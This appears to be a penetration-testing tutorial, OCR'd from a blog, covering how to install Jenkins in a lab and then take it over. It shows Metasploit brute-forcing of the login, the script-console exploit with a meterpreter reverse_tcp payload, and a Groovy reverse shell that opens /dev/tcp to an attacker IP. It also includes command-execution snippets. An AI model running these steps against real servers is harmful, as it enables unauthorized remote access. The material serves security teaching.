

JENKINS PENTESTING





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Overview

Jenkins is an open-source automation server used for continuous integration (CI) and continuous delivery (CD). It's built on Java and utilizes a scripting platform for automation. Jenkins automates tasks such as building, testing, and deployment in the software development lifecycle. This automation accelerates development cycles, enhances code quality, and streamlines releases. Key features include CI/CD pipelines, automated testing, integration with version control systems, extensibility via plugins, and robust monitoring and reporting capabilities.

Lab Setup

In this article, we are going to setup the Jenkins server on the ubuntu machine and obtain the remote code execution. Following are the machines:

Target Machine: Ubuntu (192.168.1.4)

Attacker Machine: Kali Linux (192.168.1.7)

Installation

For Jenkins to function, it necessitates the Java Runtime Environment (JRE). In this guide, we'll utilize OpenJDK to establish the Java environment. OpenJDK's development kit incorporates JRE within its framework.

apt install openjdk-11-jdk

root@ignite:~# apt install openjdk-11-jdk 🚽
Reading package lists Done
Building dependency tree Done
Peading state information Done
Reading state information Done
The following packages were automatically installed and are no lon
libflashrom1 libftdi1-2 libllvm13
Use 'sudo apt autoremove' to remove them.
The following additional packages will be installed:
ca-certificates-java fonts-dejavu-extra java-common libatk-wrapp
Suggested packages:
default-jre libice-doc libsm-doc libx11-doc libxcb-doc libxt-doc
The following NEW packages will be installed:
ca-certificates-java fonts-dejavu-extra java-common libatk-wrapp
xtrans-dev
0 upgraded, 20 newly installed, 0 to remove and 4 not upgraded.
Need to get 122 MB of archives.
After this operation 275 MB of additional disk space will be used
De very vent to continue? [V(n]
Do you want to continue? [Y/n]

At times, the default Ubuntu repository may lack the latest Jenkins version. Therefore, it is suggested opting for the project-maintained repository to access the most recent features and patches.

To integrate the Jenkins repository into the Ubuntu system, adhere to the following:

Begin by importing the GPG key to ensure package integrity.

fsSL https://pkg.jenkins.io/debian-stable/jenkins.io-2023.key | sudo tee

sudo curl -fsSL https://pkg.jenkins.io/debian-stable/jenkins.io-2023.key | sudo tee /usr/share/keyrings/jenkins-keyring.asc > /dev/null

root@ignite:~# root@ignite:~#

Following that, incorporate the Jenkins repository and append the authentication key to the source list using the command provided below:

sudo echo deb [signed-by=/usr/share/keyrings/jenkins-keyring.asc]
https://pkg.jenkins.io/debian-stable binary/ | sudo tee /etc/apt/sources.list.d/jenkins.list >
/dev/null

Now we can proceed with the Jenkins installation in the ubuntu machine.

apt install jenkins

root@ignite:~# apt install jenkins Reading package lists... Done Building dependency tree... Done Reading state information... Done The following packages were automatically installed and are no longer req libflashrom1 libftdi1-2 libllvm13 Use 'sudo apt autoremove' to remove them. The following additional packages will be installed: net-tools The following NEW packages will be installed: jenkins net-tools 0 upgraded, 2 newly installed, 0 to remove and 4 not upgraded. Need to get 91.6 MB of archives. After this operation, 94.4 MB of additional disk space will be used. Do you want to continue? [Y/n] Get:1 http://in.archive.ubuntu.com/ubuntu jammy/main amd64 net-tools amd6 Get:2 https://pkg.jenkins.io/debian-stable binary/ jenkins 2.440.3 [91.4 67% [2 jenkins 65.5 MB/91.4 MB 72%] Fetched 91.6 MB in 7min 2s (217 kB/s) Selecting previously unselected package net-tools. (Reading database ... 178436 files and directories currently installed.) Preparing to unpack .../net-tools 1.60+git20181103.0eebece-lubuntu5 amd64 Unpacking net-tools (1.60+git20181103.0eebece-lubuntu5) ... Selecting previously unselected package jenkins. Preparing to unpack .../jenkins 2.440.3 all.deb ... Unpacking jenkins (2.440.3) ... Setting up net-tools (1.60+git20181103.0eebece-lubuntu5) ... Setting up jenkins (2.440.3) ... Created symlink /etc/systemd/system/multi-user.target.wants/jenkins.servi Processing triggers for man-db (2.10.2-1) ...

After installation is complete, Jenkins can be started using the following command:

systemctl start jenkins

Status can be checked using the following command:

systemctl status jenkins

```
root@ignite:~# systemctl start jenkins
root@ignite:~#
root@ignite:~# systemctl status jenkins
jenkins.service - Jenkins Continuous Integration Server
    Loaded: loaded (/lib/systemd/system/jenkins.service; enabled; ve
    Active: active (running) since Thu 2024-04-18 03:35:40 IST; 2mir
  Main PID: 6364 (java)
    Tasks: 49 (limit: 4554)
    Memory: 1.1G
       CPU: 38.567s
    CGroup: /system.slice/jenkins.service
            –6364 /usr/bin/java -Djava.awt.headless=true -jar /usr/
Apr 18 03:35:26 ignite jenkins[6364]: 96a5973cad5f47e9838ebbe0ae03ac6
Apr 18 03:35:26 ignite jenkins[6364]: This may also be found at: /var
Apr 18 03:35:40 ignite jenkins[6364]: 2024-04-17 22:05:40.409+0000 [i
Apr 18 03:35:40 ignite jenkins[6364]: 2024-04-17 22:05:40.418+0000 [i
Apr 18 03:35:40 ignite systemd[1]: Started Jenkins Continuous Integra
Apr 18 03:35:41 ignite jenkins[6364]: 2024-04-17 22:05:41.497+0000 [i
Apr 18 03:35:41 ignite jenkins[6364]: 2024-04-17 22:05:41.498+0000 [i
root@ignite:~#
root@ignite:~# systemctl enable jenkins
Synchronizing state of jenkins.service with SysV service script with
Executing: /lib/systemd/systemd-sysv-install enable jenkins
root@ignite:~#
```

Configuration

Post installation, Jenkins can be configured to run smoothly. By checking the service running on port 8080, the Jenkins server requires an **Administrator password**.

, sign in [senit		
o C	Q 127.0.0.1:8080	115
ſ	Getting Started	
	Unlock Jenkins	
	To ensure Jenkins is securely set up by the administrator, a password has been written to the log (not sure where to find it?) and this file on the server:	
	/var/lib/jenkins/secrets/initialAdminPassword	
	Please copy the password from either location and paste it below.	
	Administrator password	
		оп

Password can be obtained by reading the content of the **initialAdminPassword** file.

cat /var/lib/Jenkins/secrets/initialAdminPassword

root@ignite:~# cat /var/lib/jenkins/secrets/initialAdminPassword -96a5973cad5f47e9838ebbe0ae03ac06

Select the **Install suggested plugins** to **Customize Jenkins** and proceed with the installation.



The final step requires the creation of **First Admin User** username and password. Here we are using the username as **raj** and password as **123**.

Setup Wizard [J	ienkins] × +	
> C	○ □ ••• 127.0.0.1:8080	ជ
G	etting Started	
	Create First Admin Use	r
	Username	
	raj	
	Password	
		
	Full name	
	raj	
	E-mail address	
	raj@gmail.com	
Je	enkins 2.440.3	Skip and continue as admin Save and Continu

Finally, entering the URL to access the Jenkins Server. The URL can be entered as <u>http://127.0.0.1:8080/</u> as we want to setup the server on the ubuntu machine.



Enumeration

After successfully installing and configuring the Jenkins server, we can start the exploitation using the kali machine. Starting with the enumeration, since at port 8080 the Jenkins Server is running in the ubuntu machine hence checking the port 8080. At port 8080 there is a Jenkins login page which requires credentials.



Exploitation using Metasploit Framework

Since the login page requires credentials, hence we can use the auxiliary available in the Metasploit framework to check for the valid username and password to login. The auxiliary which we will be using will require a **username** file and a **password** file.

It can be noted that for CTF scenarios the username file can be used as the common usernames list

(<u>https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt</u>) and password file can be used as **rockyou.txt**. However, here we are using a custom dictionary to make the scanning easier. The following commands can be used inside Metasploit framework:

use auxiliary/scanner/http/Jenkins_login set rhosts 192.168.1.4 set rport 8080 set targeturi / set user_file users.txt set pass_file passwords.txt set verbose false exploit

```
msf6 > use auxiliary/scanner/http/jenkins_login -
                              jenkins_login) > set rhosts 192.168.1.4
msf6 auxiliary(s
rhosts \Rightarrow 192.168.1.4
msf6 auxiliary(scanner/http/jenkins_login) > set rport 8080
rport \Rightarrow 8080
                    mer/http/jenkins_login) > set targeturi /
msf6 auxiliary(sc
targeturi \Rightarrow /
msf6 auxiliary(scanner/ht
                               ienkins login) > set user file users.txt
user_file \Rightarrow users.txt
                                 wkins_login) > set pass_file passwords.txt
msf6 auxiliary(sc
pass_file ⇒ passwords.txt
                             /jenkins_login) > set verbose false
msf6 auxiliary(sc
verbose \Rightarrow false
                  anner/http/jenkins_login) > exploit
msf6 auxiliary(
[+] 192.168.1.4:8080 - Login Successful: raj:123
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/jenkins_l
                                          n) >
```

Observe that the username and password have been enumerated successfully. After the username and password have been enumerated, now its time use them to exploit the target. The exploit which can be used here is the **exploit/multi/http/Jenkins_script_console**. Following commands can be used inside Metasploit framework to run the exploit:

use exploit/multi/http/Jenkins_script_console show targets set target 1 set payload linux/x64/meterpreter/reverse_tcp set rhosts 192.168.1.4 set rport 8080 set targeturi / set username raj set password 123 exploit

```
msf6 > use exploit/multi/http/jenkins_script_console
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(
                                               e) > show targets
Exploit targets:
    Id Name
    0
        Windows
   1 Linux
        Unix CMD
                     msf6 exploit(
target \Rightarrow 1
msf6 exploit(
                                               le) > set payload linux/x64/meterpreter/reverse_tcp
payload ⇒ linux/x64/meterpreter/reverse_tcp
                                                •) > set rhosts 192.168.1.4
msf6 exploit(
rhosts \Rightarrow 192.168.1.4
                                 script console) > set rport 8080 +
<u>msf6</u> exploit(
rport \Rightarrow 8080
msf6 exploit(
                                              le) > set targeturi / 🔫
targeturi \Rightarrow /
                                               le) > set username raj 🚽
msf6 exploit(
username ⇒ raj
                            nkins script_console) > set password 123 🛥
msf6 exploit(
password \Rightarrow 123
                         ienkins script console) > exploit
msf6 exploit(
[*] Started reverse TCP handler on 192.168.1.7:4444
[*] Checking access to the script console
[*] Logging in ...
[*] Using CSRF token: '8a15b6a4bc20556a9d8e6a669fa3820335b5e08a313c647fd158d7f4d7a2ab87' (Jenkins-Cr
[*] 192.168.1.4:8080 - Sending Linux stager...
[*] Sending stage (3045380 bytes) to 192.168.1.4
[★] Meterpreter session 1 opened (192.168.1.7:4444 \rightarrow 192.168.1.4:37800) at 2024-04-17 16:40:22 -040
[*] Command Stager progress - 100.00% done (823/823 bytes)
meterpreter > sysinfo
Computer : 192.168.1.4
0S
             : Ubuntu 22.04 (Linux 6.5.0-27-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```

Observe that the reverse shell has been obtained after the exploit has been successfully executed.

Exploiting Manually (Reverse Shell)

To exploit manually, we require the username and password of the Jenkins Console. Assuming here that the attacker has already found the credentials either by brute forcing or through any other method, successful login into the console can be performed.

After login using the previously found credentials (**raj:123**) from the auxiliary. The **Manage Jenkins** functionality can be accessed which contains a **Script Console** functionality.

🖣 Jenkins	
Jashboard 🗧 Manage Jenkins	
+ New Item	Manage Jenkins
Build History	System Configuration
Manage Jenkins	System Tools Plugins
My Views	Configure global settings and paths. Configure cols, their locations and automatic installers. Add, remove, disable or enable plugins that can extend the functionality of Jenkins.
Build Queue No builds in the queue.	 Clouds Add, remove, and configure cloud instances to provision agents on-demand. Appearance Configure the look and feel of Jenkins
Build Executor Status	×
1 Idle	Security
2 Idle	Security Secure Jenkins; define who is allowed to access/use the system. Credentials Configure credentials Configure credentials Configure the credential providers and types
	Status Information
	System Information Displays various environmental information to assist trouble-shooting. System Log Sy
	Troubleshooting
	Manage Old Data Scrub configuration files to remove remnants from old plugins and earlier versions.
	Tools and Actions
	Reload Configuration from Disk Jenkins CLI Discard all the loaded data in memory and reload everything from file system. Useful when you modified config files directly on disk. Jenkins CLI

In Jenkins, **Groovy** serves as the main scripting language for defining jobs and pipelines. Groovy, being dynamic and operating on the Java Virtual Machine (JVM), seamlessly integrates with Jenkins, which is predominantly Java-based. Therefore, we are going to use the groovy reverse shell script to obtain the reverse shell. The command for the **groovy reverse shell** can be obtained from the following URL: <u>https://www.revshells.com</u> and selecting the Groovy script payload.



Now, using the above groovy reverse shell script in the Jenkins script console. Before running the script make sure to start the **netcat listener** at port 443 inside kali machine using the following command:

rlwrap nc -lnvp 443



DECTADI INICA 440.5

Finally, the reverse shell is obtained at port 443 after running the above groovy script.

(root@kali)-[~]
🖵 rlwrap nc -lvnp 443 🚽 🛶
listening on [any] 443
connect to [192.168.1.7] from (UNKNOWN) [192.168.1.4] 35060
ifconfig
ens33: flags=4163 <up,broadcast,running,multicast> mtu 1500</up,broadcast,running,multicast>
inet 192.168.1.4 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 2401:4900:1c22:12f1:bf78:81b4:5b31:cef0 prefixlen 64 scopeid 0×0<
inet6 fe80::b7be:bb1b:88fa:4b1c prefixlen 64 scopeid 0×20 <link/>
inet6 2401:4900:1c22:12f1:36df:d29e:6702:1234 prefixlen 64 scopeid 0×0<
ether 00:0c:29:10:98:21 txqueuelen 1000 (Ethernet)
RX packets 2728 bytes 3332603 (3.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX nackets 1048 hytes 968651 (968.6 KB)
TX errors 0 dropped 0 overrups 0 carrier 0 collisions 0
lo: flags=73/UP LOOPBACK RUNNINGS mtu 65536
inet 127 0 0 1 netmack 255 0 0 0
inet 127.0.0.1 Helmask 255.0.0.0
leen tyguqualan 1000 (leen) leenhack)
DV posleta 120 butes 11102 (11 1 KD)
RX packets 129 bytes 11193 (11.1 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 129 bytes 11193 (11.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

An alternate way to get the reverse shell can be by running the following script in the script console:

```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/192.168.1.7/443; cat <&5 | while read line; do
\$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

Make sure to start the listener at port 443 before running the script.

Script Console

Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the 'println' command to see the output (if you use System.out, it will go to the server's stdout, which is harder to see.) Example:

println(Jenkins.instance.pluginManager.plugins)

All the classes from all the plugins are visible, jenkins.*, jenkins.model.*, hudson.*, and hudson.model.* are pre-imported.



Observe that the reverse shell is obtained at port 443 after the execution of the script.



Executing Shell Commands Directly

There are cases where we don't have a listener to take the reverse shell. In those cases, we can directly run the script and obtain the output of the code in the **Result** window.

The following code is used to get the output of the system commands:

```
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```

Observe that after running the script the output can be seen directly in the **Result** window.

Script Console

Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the 'println' command to see the

println(Jenkins.instance.pluginManager.plugins)

All the classes from all the plugins are visible, jenkins, *, jenkins, model. *, hudson. *, and hudson. model. * are pre-imported.

```
1 def sout = new StringBuffer(), serr = new StringBuffer()
2 def proc = 'ifconfig'.execute()
3 proc.consumeProcessOutput(sout, serr)
4 proc.waitForOrKill(1000)
5 println "out> $sout err> $serr"
```

```
Result ©
 out> ens33: flags=4163<UP, BROADCAST, RUNNING, MULTICAST> mtu 1500
         inet 192.168.1.4 netmask 255.255.255.0 broadcast 192.168.1.255
         inet6 2401:4900:1c22:12f1:bf78:81b4:5b31:cef0 prefixlen 64 scopeid 0x0<global>
        inet6 fe80::b7be:bb1b:88fa:4b1c prefixlen 64 scopeid 0x20<link>
        inet6 2401:4900:1c22:12f1:36df:d29e:6702:1234 prefixlen 64 scopeid 0x0<global>
         ether 00:0c:29:10:98:21 txqueuelen 1000 (Ethernet)
         RX packets 4537 bytes 4032964 (4.0 MB)
         RX errors 0 dropped 0 overruns 0 frame 0
         TX packets 1970 bytes 1479706 (1.4 MB)
         TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
         inet 127.0.0.1 netmask 255.0.0.0
         inet6 ::1 prefixlen 128 scopeid 0x10<host>
         loop txqueuelen 1000 (Local Loopback)
         RX packets 139 bytes 12221 (12.2 KB)
         RX errors 0 dropped 0 overruns 0 frame 0
         TX packets 139 bytes 12221 (12.2 KB)
         TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  err>
```

A similar code which can be used to get the command output in the Result window can be:

```
def proc = "id".execute();
def os = new StringBuffer();
proc.waitForProcessOutput(os, System.err);
println(os.toString());
```

Observe that after running the script the output can be seen directly in the **Result** window.

Script Console

Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the 'println' command

println(Jenkins.instance.pluginManager.plugins)

All the classes from all the plugins are visible. jenkins.*, jenkins.model.*, hudson.*, and hudson.model.* are pre-imported.





uid=129(jenkins) gid=137(jenkins) groups=137(jenkins)

Conclusion

In summary, the possibility of using Jenkins servers to gain a reverse shell emphasizes the crucial need for strong security practices. Whether due to compromised logins or no authentication at all, the vulnerability of Jenkins servers shows why we must take security seriously. It's essential for organizations to enforce strict access rules, conduct regular security checks, and promptly update systems to reduce the chances of unauthorized access and misuse.



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